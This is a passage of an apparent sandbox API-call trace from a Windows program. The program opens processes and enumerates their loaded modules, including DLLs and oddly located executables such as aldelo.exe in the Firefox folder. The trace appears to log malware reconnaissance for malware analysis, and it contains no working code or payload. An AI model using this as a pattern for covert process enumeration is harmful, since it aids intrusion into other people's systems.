hModule=0x7feff970000, lpmodinfo=0x2552650, cb=0x18 | out: lpmodinfo=0x2552650*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0073.068] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff970000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0073.069] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff970000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0073.070] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9c0000, lpmodinfo=0x2554810, cb=0x18 | out: lpmodinfo=0x2554810*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0073.071] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9c0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0073.072] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9c0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0073.074] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc950000, lpmodinfo=0x25569d8, cb=0x18 | out: lpmodinfo=0x25569d8*(lpBaseOfDll=0x7fefc950000, SizeOfImage=0xbb000, EntryPoint=0x7fefc956de0)) returned 1 [0073.075] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc950000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="FirewallAPI.dll") returned 0xf [0073.076] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc950000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")) returned 0x23 [0073.077] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc940000, lpmodinfo=0x2558ba8, cb=0x18 | out: lpmodinfo=0x2558ba8*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0073.079] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc940000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0073.080] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc940000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0073.081] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb270000, lpmodinfo=0x255ad68, cb=0x18 | out: lpmodinfo=0x255ad68*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0073.083] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb270000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0073.084] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb270000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0073.085] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb260000, lpmodinfo=0x255cf38, cb=0x18 | out: lpmodinfo=0x255cf38*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0073.087] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb260000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0073.088] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb260000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0073.089] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac20000, lpmodinfo=0x255f0f8, cb=0x18 | out: lpmodinfo=0x255f0f8*(lpBaseOfDll=0x7fefac20000, SizeOfImage=0x11000, EntryPoint=0x7fefac216ac)) returned 1 [0073.091] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac20000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0073.092] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac20000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")) returned 0x21 [0073.094] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac00000, lpmodinfo=0x25612c8, cb=0x18 | out: lpmodinfo=0x25612c8*(lpBaseOfDll=0x7fefac00000, SizeOfImage=0x18000, EntryPoint=0x7fefac01bf8)) returned 1 [0073.095] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac00000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0073.097] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac00000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")) returned 0x20 [0073.098] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd070000, lpmodinfo=0x2563498, cb=0x18 | out: lpmodinfo=0x2563498*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0073.100] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd070000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0073.101] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd070000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0073.103] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcd70000, lpmodinfo=0x2565658, cb=0x18 | out: lpmodinfo=0x2565658*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0073.105] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcd70000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0073.107] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcd70000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0073.109] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd010000, lpmodinfo=0x2567818, cb=0x18 | out: lpmodinfo=0x2567818*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0073.110] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd010000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0073.112] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd010000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0073.114] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd000000, lpmodinfo=0x25699d8, cb=0x18 | out: lpmodinfo=0x25699d8*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0073.115] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd000000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0073.117] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd000000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0073.119] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefca10000, lpmodinfo=0x256bb98, cb=0x18 | out: lpmodinfo=0x256bb98*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0073.120] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefca10000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0073.122] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefca10000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0073.124] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef40a0000, lpmodinfo=0x256dd68, cb=0x18 | out: lpmodinfo=0x256dd68*(lpBaseOfDll=0x7fef40a0000, SizeOfImage=0x11b000, EntryPoint=0x7fef4167b5c)) returned 1 [0073.126] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef40a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="fntcache.dll") returned 0xc [0073.128] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef40a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\fntcache.dll" (normalized: "c:\\windows\\system32\\fntcache.dll")) returned 0x20 [0073.129] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa9e0000, lpmodinfo=0x256ff38, cb=0x18 | out: lpmodinfo=0x256ff38*(lpBaseOfDll=0x7fefa9e0000, SizeOfImage=0xa000, EntryPoint=0x7fefa9e260c)) returned 1 [0073.131] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa9e0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ktmw32.dll") returned 0xa [0073.133] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa9e0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0073.135] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb800000, lpmodinfo=0x25720f8, cb=0x18 | out: lpmodinfo=0x25720f8*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0073.137] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb800000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0073.139] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb800000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0073.141] GetModuleInformation (in: hProcess=0x214, hModule=0x7feffae0000, lpmodinfo=0x25744d0, cb=0x18 | out: lpmodinfo=0x25744d0*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0073.143] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feffae0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0073.145] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feffae0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0073.147] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd610000, lpmodinfo=0x2576690, cb=0x18 | out: lpmodinfo=0x2576690*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0073.149] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd610000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0073.151] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd610000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0073.154] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd640000, lpmodinfo=0x2578850, cb=0x18 | out: lpmodinfo=0x2578850*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0073.156] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd640000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0073.158] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd640000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0073.160] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcc70000, lpmodinfo=0x257aa28, cb=0x18 | out: lpmodinfo=0x257aa28*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0073.162] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcc70000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0073.164] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcc70000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0073.166] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd760000, lpmodinfo=0x257cbe8, cb=0x18 | out: lpmodinfo=0x257cbe8*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0073.168] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd760000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0073.171] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd760000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0073.173] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb38) returned 0x214 [0073.173] EnumProcessModules (in: hProcess=0x214, lphModule=0x257fe08, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x257fe08, lpcbNeeded=0x23ee40) returned 1 [0073.174] GetModuleInformation (in: hProcess=0x214, hModule=0xe10000, lpmodinfo=0x2580078, cb=0x18 | out: lpmodinfo=0x2580078*(lpBaseOfDll=0xe10000, SizeOfImage=0x17000, EntryPoint=0xe114a1)) returned 1 [0073.174] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xe10000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="bitkinex.exe") returned 0xc [0073.174] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xe10000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Program Files\\Microsoft Office\\bitkinex.exe" (normalized: "c:\\program files\\microsoft office\\bitkinex.exe")) returned 0x2e [0073.174] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2582298, cb=0x18 | out: lpmodinfo=0x2582298*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.175] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.175] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.175] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x2584458, cb=0x18 | out: lpmodinfo=0x2584458*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0073.176] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0073.176] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0073.176] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x2586618, cb=0x18 | out: lpmodinfo=0x2586618*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0073.177] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0073.177] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0073.178] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x25887e8, cb=0x18 | out: lpmodinfo=0x25887e8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0073.178] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0073.179] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0073.179] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbfc) returned 0x214 [0073.179] EnumProcessModules (in: hProcess=0x214, lphModule=0x258af20, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x258af20, lpcbNeeded=0x23ee40) returned 1 [0073.180] GetModuleInformation (in: hProcess=0x214, hModule=0x300000, lpmodinfo=0x258b190, cb=0x18 | out: lpmodinfo=0x258b190*(lpBaseOfDll=0x300000, SizeOfImage=0x17000, EntryPoint=0x3014a1)) returned 1 [0073.180] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x300000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="trillian.exe") returned 0xc [0073.181] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x300000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Common Files\\trillian.exe" (normalized: "c:\\program files (x86)\\common files\\trillian.exe")) returned 0x30 [0073.181] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x258d3b8, cb=0x18 | out: lpmodinfo=0x258d3b8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.181] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.182] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.182] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x258f578, cb=0x18 | out: lpmodinfo=0x258f578*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0073.182] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0073.183] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0073.183] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x2591738, cb=0x18 | out: lpmodinfo=0x2591738*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0073.183] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0073.184] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0073.184] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x2593908, cb=0x18 | out: lpmodinfo=0x2593908*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0073.185] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0073.185] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0073.186] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9ac) returned 0x214 [0073.186] EnumProcessModules (in: hProcess=0x214, lphModule=0x2596028, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2596028, lpcbNeeded=0x23ee40) returned 1 [0073.202] GetModuleInformation (in: hProcess=0x214, hModule=0x9a0000, lpmodinfo=0x2596298, cb=0x18 | out: lpmodinfo=0x2596298*(lpBaseOfDll=0x9a0000, SizeOfImage=0x17000, EntryPoint=0x9a14a1)) returned 1 [0073.202] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x9a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="new-official.exe") returned 0x10 [0073.202] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x9a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows NT\\new-official.exe" (normalized: "c:\\program files\\windows nt\\new-official.exe")) returned 0x2c [0073.202] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x25984c0, cb=0x18 | out: lpmodinfo=0x25984c0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.203] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.203] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.203] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x259a680, cb=0x18 | out: lpmodinfo=0x259a680*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0073.204] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0073.204] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0073.204] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x259c840, cb=0x18 | out: lpmodinfo=0x259c840*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0073.205] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0073.205] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0073.206] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x259ea28, cb=0x18 | out: lpmodinfo=0x259ea28*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0073.206] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0073.207] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0073.207] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5d0) returned 0x214 [0073.207] EnumProcessModules (in: hProcess=0x214, lphModule=0x25a1148, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x25a1148, lpcbNeeded=0x23ee40) returned 1 [0073.208] GetModuleInformation (in: hProcess=0x214, hModule=0x2e0000, lpmodinfo=0x25a13b8, cb=0x18 | out: lpmodinfo=0x25a13b8*(lpBaseOfDll=0x2e0000, SizeOfImage=0x17000, EntryPoint=0x2e14a1)) returned 1 [0073.208] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x2e0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="aldelo.exe") returned 0xa [0073.208] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x2e0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Mozilla Firefox\\aldelo.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\aldelo.exe")) returned 0x31 [0073.209] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x25a35d8, cb=0x18 | out: lpmodinfo=0x25a35d8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.209] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.209] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.210] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x25a5798, cb=0x18 | out: lpmodinfo=0x25a5798*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0073.210] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0073.210] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0073.211] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x25a7958, cb=0x18 | out: lpmodinfo=0x25a7958*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0073.211] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0073.211] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0073.212] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x25a9b28, cb=0x18 | out: lpmodinfo=0x25a9b28*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0073.212] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0073.213] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0073.213] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x758) returned 0x214 [0073.213] EnumProcessModules (in: hProcess=0x214, lphModule=0x25ac248, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x25ac248, lpcbNeeded=0x23ee40) returned 1 [0073.214] GetModuleInformation (in: hProcess=0x214, hModule=0x170000, 